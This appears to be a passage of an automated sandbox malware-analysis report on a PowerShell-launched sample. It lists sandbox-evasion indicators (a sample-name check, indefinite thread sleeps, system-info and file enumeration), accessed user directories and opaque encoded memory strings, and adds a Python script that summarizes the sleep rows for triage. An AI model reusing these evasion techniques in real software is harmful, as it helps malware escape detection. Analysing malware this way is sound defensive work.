              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (37 identical rows)
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (2 identical rows)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (24 identical rows)

              Malware Analysis System Evasion

Source: 15.2.powershell.exe.8c10000.1.raw.unpack, qpjkq.cs .Net Code: Main contains sample name check
Source: 42.2.powershell.exe.6d05ce8.0.raw.unpack, qpjkq.cs .Net Code: Main contains sample name check
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,7_2_0040DD85
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (45 identical rows)
Note: 922337203685477 equals (2^63 - 1) / 10000, the largest relative wait a signed 64-bit 100-ns LARGE_INTEGER can express once converted to milliseconds; a delay of this size is in effect an indefinite sleep, not a timed one.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5297
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4457
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: foregroundWindowGot 1664
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5337
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3181
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4559
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2271
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6368
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2943
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5906
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2448
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4707
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2171
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4208
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3629
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1830
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2871
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3472
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4137
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3252
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2277
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe API coverage: 8.4 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7660 Thread sleep count: 5297 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724 Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648 Thread sleep count: 4457 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7752 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7752 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1724 Thread sleep count: 5337 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1736 Thread sleep count: 3181 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 924 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6576 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7268 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7484 Thread sleep count: 4559 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7576 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7484 Thread sleep count: 2271 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7484 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1824 Thread sleep count: 6368 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1960 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3076 Thread sleep count: 2943 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2184 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1824 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7796 Thread sleep count: 5906 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4520 Thread sleep count: 2448 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6872 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7868 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4252 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300 Thread sleep count: 4707 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8156 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5224 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232 Thread sleep count: 2171 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6768 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2148 Thread sleep count: 4208 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6912 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 928 Thread sleep count: 3629 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7460 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2268 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 504 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5328 Thread sleep count: 1830 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5612 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6832 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5572 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5912 Thread sleep count: 2871 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5748 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5672 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5736 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 912 Thread sleep count: 3472 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1592 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1056 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1600 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4588 Thread sleep count: 4137 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6168 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7548 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4868 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6568 Thread sleep count: 3252 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1724 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6568 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3932 Thread sleep count: 2277 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2660 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2208 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3956 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
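The sleep-related rows above are the raw signature output and are hard to read in bulk: the same indefinite delay is reported dozens of times, and the per-thread "sleep time" totals are exact multiples of 922337203685477, the maximum relative wait a 64-bit 100-ns LARGE_INTEGER can encode in milliseconds. The following triage script is an added example, not Joe Sandbox code and not part of this report; it assumes rows in the column layout shown on this page (with the "Jump to behavior" link residue removed), parses them, collapses the repetition into per-thread figures, and applies the report's own "sleep count > 30" rule. The sample rows embedded in it are copied from the report above; a real report would be fed in the same way.

```python
import re
from collections import Counter, defaultdict

# Largest relative delay that fits a signed 64-bit 100-ns LARGE_INTEGER,
# in milliseconds: (2**63 - 1) // 10_000 == 922337203685477. Joe Sandbox
# prints exactly this value as "delay time", so such a row is in effect an
# indefinite sleep rather than a timed one.
MAX_DELAY_MS = (2**63 - 1) // 10_000
SLEEP_COUNT_THRESHOLD = 30   # the report's own "sleep count > 30" rule

# Constructed sample input: rows copied from the report above, with the
# column separator restored and the "Jump to behavior" link residue removed.
SAMPLE_ROWS = """\
Source: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe Window / User API: foregroundWindowGot 1664
Source: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe TID: 7660 Thread sleep count: 5297 > 30
Source: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe TID: 7724 Thread sleep time: -13835058055282155s >= -30000s
Source: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe TID: 7648 Thread sleep count: 4457 > 30
Source: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe TID: 7752 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe TID: 7752 Thread sleep time: -922337203685477s >= -30000s
Source: C:\\Windows\\System32\\conhost.exe Last function: Thread delayed
"""

_PROC = r"^Source: (?P<proc>\S+) "
ROW_PATTERNS = {
    "delayed":     re.compile(_PROC + r"Thread delayed: delay time: (?P<ms>\d+)$"),
    "sleep_count": re.compile(_PROC + r"TID: (?P<tid>\d+) Thread sleep count: (?P<n>\d+) > (?P<thr>\d+)$"),
    "sleep_time":  re.compile(_PROC + r"TID: (?P<tid>\d+) Thread sleep time: -(?P<ms>\d+)s >= -(?P<thr>\d+)s$"),
    "user_api":    re.compile(_PROC + r"Window / User API: (?P<api>\w+) (?P<n>\d+)$"),
}


def parse_rows(text):
    """Turn report rows into event dicts. Rows matching no pattern are kept
    under kind 'other' so nothing silently disappears during triage."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        for kind, pat in ROW_PATTERNS.items():
            m = pat.match(line)
            if m:
                events.append({"kind": kind, **m.groupdict()})
                break
        else:
            events.append({"kind": "other", "raw": line})
    return events


def is_indefinite(delay_ms):
    """True when a delay equals the maximum encodable 100-ns relative wait."""
    return int(delay_ms) == MAX_DELAY_MS


def summarize(events):
    """Collapse the repetitive evasion rows into per-thread figures."""
    indefinite = 0
    count_by_tid = {}
    units_by_tid = defaultdict(int)   # number of maximum-length waits per thread
    api_polls = Counter()
    other = 0
    for ev in events:
        k = ev["kind"]
        if k == "delayed":
            indefinite += is_indefinite(ev["ms"])
        elif k == "sleep_count":
            tid, n = ev["tid"], int(ev["n"])
            count_by_tid[tid] = max(count_by_tid.get(tid, 0), n)
        elif k == "sleep_time":
            # The reported totals are exact multiples of MAX_DELAY_MS: the
            # sandbox summed several maximum-length waits on the same thread.
            units_by_tid[ev["tid"]] += int(ev["ms"]) // MAX_DELAY_MS
        elif k == "user_api":
            api_polls[ev["api"]] += int(ev["n"])
        else:
            other += 1
    flagged = sorted(t for t, n in count_by_tid.items() if n > SLEEP_COUNT_THRESHOLD)
    return {
        "indefinite_delay_rows": indefinite,
        "sleep_count_by_tid": count_by_tid,
        "sleep_units_by_tid": dict(units_by_tid),
        "flagged_tids": flagged,
        "foreground_window_polls": api_polls["foregroundWindowGot"],
        "unparsed_rows": other,
    }


if __name__ == "__main__":
    for key, value in summarize(parse_rows(SAMPLE_ROWS)).items():
        print(f"{key}: {value}")
```

On the sample rows the script reports two indefinite-delay rows, 15 maximum-length waits on thread 7724 and 3 on thread 7752, and flags threads 7648 and 7660 for exceeding the sleep-count threshold; the conhost.exe row is counted as unparsed rather than dropped.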
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_0040AE51 FindFirstFileW,FindNextFileW,7_2_0040AE51
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,8_2_00407EF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,9_2_00407898
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00418981 memset,GetSystemInfo,7_2_00418981
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (45 identical rows)
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
              Source: powershell.exe, 00000019.00000002.1948275505.0000000008576000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rEPv/C9yt8s3PktU5E4UolUEaWenEFR0J7cMKnzrj2kKPQjai23OtzgVSiSj397YBRoWDTp0TISUKgz5zKWUSLRUhjBxgPqCaRQTYOlGC6mM/x21L3L5rqrDLGZMXnPmBhSVbpbA8o04SOJY9ZFKtDrzSFTRqqw22eVtDWYFMAexfj/VC9L5cm1PpRny+gcZVygPQvFbTearpOQkhgFsT00WgmxOCNtglJYIXiPHd/piHBnMx2TiTaIUHgFb1N2resKUvZsznauaixhnQdNO+9MVHED0w0p9JYGV6xlAkxFeNIf9EowEqUawqtQuiOx/1J11XBBc+MCG4glmjQvrg419uykzEFWX55qVXEhZHLU/q1iyQcdvAPpa7PpyO5sKW1ff92qKXARzB8qEd2BFCwIay8ziEk2HFJlMkoty44Gr9smb8+uR3/f4oRZcf5QyzA8OB48J2d6c2E6Fdet3EIo2
              Source: powershell.exe, 0000000F.00000002.1627813047.0000000008888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9ZFKtDrzSFTRqqw22eVtDWYFMAexfj/VC9L5cm1PpRny+gcZVygPQvFbTearpOQkhgFsT00WgmxOCNtglJYIXiPHd/piHBnMx2TiTaIUHgFb1N2resKUvZsznauaixhnQdNO+9MVHED0w0p9JYGV6xlAkxFeNIf9EowEqUaw
              Source: powershell.exe, 00000020.00000002.2100429736.000000000724A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<#
              Source: powershell.exe, 00000025.00000002.2273047650.0000000007308000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
              Source: powershell.exe, 0000000F.00000002.1623727683.00000000073E1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllfW
              Source: powershell.exe, 0000002A.00000002.2454927477.0000000007B9B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
              Source: powershell.exe, 00000019.00000002.1939922208.0000000007504000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
              Source: powershell.exe, 0000003A.00000002.3329140310.0000000007491000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll11`:
